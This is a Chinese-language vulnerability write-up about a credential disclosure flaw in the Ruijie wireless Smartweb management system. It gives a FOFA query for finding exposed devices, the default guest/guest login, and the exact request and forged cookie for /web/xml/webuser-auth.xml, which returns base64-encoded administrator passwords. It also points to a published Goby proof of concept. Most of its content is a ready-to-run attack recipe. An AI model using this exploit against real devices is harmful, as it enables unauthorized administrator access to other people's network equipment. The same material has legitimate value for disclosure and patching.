锐捷Smartweb管理系统_密码信息泄露漏洞

# 锐捷Smartweb管理系统 密码信息泄露漏洞

## 漏洞描述

锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。

## 漏洞影响

> [!NOTE]
>
> 锐捷网络股份有限公司 无线smartweb管理系统

## FOFA

> [!NOTE]
>
> title=”无线smartWeb–登录页面”

## 漏洞复现

登录页面如下

![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/1.png)

默认存在 guest账户,账号密码为 **guest/guest**

其中登录的过程中搜索admin的数据后发现请求了一个文件 **/web/xml/webuser-auth.xml**,而且响应中包含了 admin密码的base64加密

![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/2.png)

解密就可以获得 admin管理员的密码,尝试直接请求

“`
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml

Cookie添加
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
“`

![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/3.png)

直接获得所有的账户的等级标志和base64加密的账号密码

## Goby & POC

> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> Ruijie_smartweb_password_information_disclosure

![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/4.png)

![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/5.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容